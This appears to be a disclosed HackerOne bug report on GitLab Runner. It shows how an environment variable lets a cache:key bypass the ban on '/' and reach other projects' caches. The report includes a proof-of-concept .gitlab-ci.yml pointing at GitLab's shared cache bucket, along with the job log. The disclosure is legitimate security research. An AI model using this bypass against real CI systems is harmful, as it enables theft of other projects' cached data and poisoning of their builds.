gitlab runner: cache key bypass / cache poisoning / cache retrieval
HackerOne report #565419 by wiardvanrij
on 2019-05-03, assigned to asaba
:
Summary
By bypassing the limits on the cache key, it is possible to store & retrieve other project cache files.
"The cache:key variable cannot contain the / character, or the equivalent URI-encoded %2F; a value made only of dots (., %2E) is also forbidden."
Yet we can override this by setting an env variable, which does get parsed.
Steps to reproduce
Create a .gitlab-ci.yml
Set an env variable like:
variables:
FOO: "https://storage.googleapis.com/gitlab-com-runners-cache/project/1/foo"
and use the cache key like:
cache:
key: "$FOO"
Full gitlab-ci:
stages:
- build
before_script:
- echo "Hello"
job A:
variables:
FOO: "https://storage.googleapis.com/gitlab-com-runners-cache/project/1/foo"
stage: build
script:
- echo "lets go"
cache:
key: "$FOO"
paths:
- whatever/
after_script:
- echo "done"
Impact
Checking cache for https://storage.googleapis.com/gitlab-com-runners-cache/project/1/foo...
I have not done excessive testing but it does look like it will access other project cache files. The same goes for setting cache.
Examples
Running with gitlab-runner 11.10.1 (1f513601)
on docker-auto-scale 72989761
Using Docker executor with image ruby:2.5 ...
Pulling docker image ruby:2.5 ...
Using docker image sha256:e86557c9a8ab97ec7e9ba705f3e3411428b50d19d38643a0f52cb49faf735d3d for ruby:2.5 ...
Running on runner-72989761-project-10726061-concurrent-0 via runner-72989761-srm-1556917093-813141f1...
Initialized empty Git repository in /builds/wiardvanrij/testing/.git/
Fetching changes...
Created fresh repository.
From https://gitlab.com/wiardvanrij/testing
* [new branch] master -> origin/master
Checking out d2575cb2 as master...
Skipping Git submodules setup
Checking cache for https://storage.googleapis.com/gitlab-com-runners-cache/project/1/foo...
FATAL: file does not exist
What is the current bug behavior?
(What actually happens, include relevant screenshots, API results, or complete HTTP requests)
What is the expected correct behavior?
The cache:key variable cannot contain the / character, or the equivalent URI-encoded %2F; a value made only of dots (., %2E) is also forbidden.
Relevant logs and/or screenshots
(Paste any relevant logs - please use code blocks (```) to format console output,
logs, and code as it's very hard to read otherwise.)
Output of checks
This bug happens on GitLab.com
Results of GitLab environment info
n/a
Impact
It would be possible to retrieve cache data from other projects. Visa-Versa it would be possible to "poison" other projects cache data.